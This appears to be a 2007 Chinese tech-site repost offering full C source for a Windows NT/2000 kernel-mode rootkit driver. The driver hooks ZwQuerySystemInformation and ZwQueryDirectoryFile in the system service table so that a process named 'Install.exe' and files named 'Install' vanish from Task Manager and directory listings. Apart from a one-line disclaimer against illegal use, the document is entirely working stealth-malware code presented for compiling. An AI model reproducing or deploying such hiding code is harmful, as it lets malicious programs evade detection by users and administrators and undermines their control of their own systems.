精典的ASP 传奇的J2EE 新生的NET FTP服务器服务器安全 WINDOWS B/S 模式 WEB安全 WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建 Alexa专题 DHTML 项目管理 WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual Basic Visual C/C++ Mssql MySql oracle Sybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术 WAP入门

您的位置： >> 相关知识 >> 桌面应用程序 >> Visual Basic >>

NT/2000下面用驱动实现真正的进程,文件,目录隐藏

合金网络科技

添加日期:2007-5-17 点击次数:166次

最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,
重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,
隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的
情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.
程序用于实验,请勿非法使用

//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:\Temp\Hide\Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////

#include 'ntddk.h'
#include 'Driver.h'
#include 'stdio.h'

/////////////////////////////////////////////////////////////////////////////

char g_szHideProcName[] = 'Install.exe';
WCHAR g_wszHideFileName[] = L'Install';

ULONG g_nProcessNameOffset;
BOOL g_hide_proc = TRUE;

/////////////////////////////////////////////////////////////////////////////

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
int i;
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
WCHAR wchrDeviceName[] = L'\\Device\\Hide';
WCHAR wchrDeviceLinkName[] = L'\\DosDevices\\Hide';
UNICODE_STRING wszDeviceName;
UNICODE_STRING wszDeviceLinkName;

RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
if (ntStatus != STATUS_SUCCESS)
goto Exit0;
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
if (ntStatus != STATUS_SUCCESS)
{
IoDeleteDevice(pDeviceObject);
goto Exit0;
}
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
pDriverObject->MajorFunction[i] = OnDriverDispatch;
pDriverObject->DriverUnload = OnDriverUnload;
GetProcessNameOffset();
HookSysCall();//Hook系统服务
Exit0:
return ntStatus;
}

/////////////////////////////////////////////////////////////////////////////

void GetProcessNameOffset()
{
int i;
PEPROCESS CurrentProc;
CurrentProc = PsGetCurrentProcess();
for (i = 0; i < 3 * PAGE_SIZE; i++)
{
if(!strncmp('System', (PCHAR)CurrentProc + i, strlen('System')))
g_nProcessNameOffset = i;
}
}

/////////////////////////////////////////////////////////////////////////////

BOOL GetProcessName(PCHAR pszName)
{
char *pszTempName;
PEPROCESS CurrentProc;

if (g_nProcessNameOffset)
{
CurrentProc = PsGetCurrentProcess();
pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
strncpy(pszName, pszTempName, NT_PROCNAMELEN);
pszName[NT_PROCNAMELEN] = 0;
return TRUE;
}
return FALSE;
}

/////////////////////////////////////////////////////////////////////////////

void HookSysCall()
{
OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
_asm sti;
}

/////////////////////////////////////////////////////////////////////////////

void UnHookSysCall()
{
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
_asm sti;
}

/////////////////////////////////////////////////////////////////////////////

NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
ANSI_STRING astrProcName;
ANSI_STRING astrHideProcName;

struct SYSTEM_PROCESS *Curr;
struct SYSTEM_PROCESS *Prev;
RtlInitAnsiString(&astrHideProcName, g_szHideProcName);
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);

if(!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)//比较当前进程是否隐藏进程,是就退出,不对隐藏进程的做任何限制
goto Exit0;
if (SystemInformationClass != 5)
goto Exit0;
Curr = (struct SYSTEM_PROCESS *)SystemInformation;
Prev = NULL;
Loop:
if (Curr == NULL)
goto Exit0;
RtlUnicodeStringToAnsiString(&astrProcName, &(Curr->ProcessName), TRUE);
if ((astrProcName.Length > 0) && (astrProcName.Length < 255))
;
else
goto Next;
if (RtlCompareString(&astrProcName, &astrHideProcName, TRUE) != 0)
goto Next;
if (Prev)
{
if (Curr->NextEntryDelta)
Prev->NextEntryDelta += Curr->NextEntryDelta;
else
Prev->NextEntryDelta = 0;
}
else
{
if (Curr->NextEntryDelta)
(char *)SystemInformation += Curr->NextEntryDelta;
else
SystemInformation = NULL;
}
Next:
RtlFreeAnsiString(&astrProcName);
Prev = Curr;
if (Curr->NextEntryDelta)
(char *)Curr += Curr->NextEntryDelta;
else
Curr = NULL;
goto Loop;
Exit0:
return ntStatus;
}

/////////////////////////////////////////////////////////////////////////////

NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
/* PIO_STACK_LOCATION IrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}

/////////////////////////////////////////////////////////////////////////////

void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
WCHAR wchrDeviceLinkName[] = L'\\DosDevices\\Hide';
UNICODE_STRING wszDeviceLinkName;

UnHookSysCall();
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
IoDeleteSymbolicLink(&wszDeviceLinkName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
/////////////////////////////////////////////////////////////////////////////

NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
BOOL bLastOne;
int iPos;
int iLeft;
pDirEntry pCurrDir;
pDirEntry pLastDir;

GetProcessName(szProcessName);
ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if (!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, 'Install', 7) == 0)
goto Exit0;
pCurrDir = (pDirEntry)FileInformationBuffer;
pLastDir = NULL;
do
{
bLastOne = !(pCurrDir->dwLenToNext);
if (RtlCompareMemory((PVOID)&pCurrDir->suName[0], (PVOID)&g_wszHideFileName[0], 14) == 14)
{
if (bLastOne)
{
if (pCurrDir == (pDirEntry)FileInformationBuffer)
ntStatus = 0x80000006;
else
pLastDir->dwLenToNext = 0;
break;
}
else
{
iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
continue;
}
}
pLastDir = pCurrDir;
pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
} while (!bLastOne);
Exit0:
return ntStatus;
}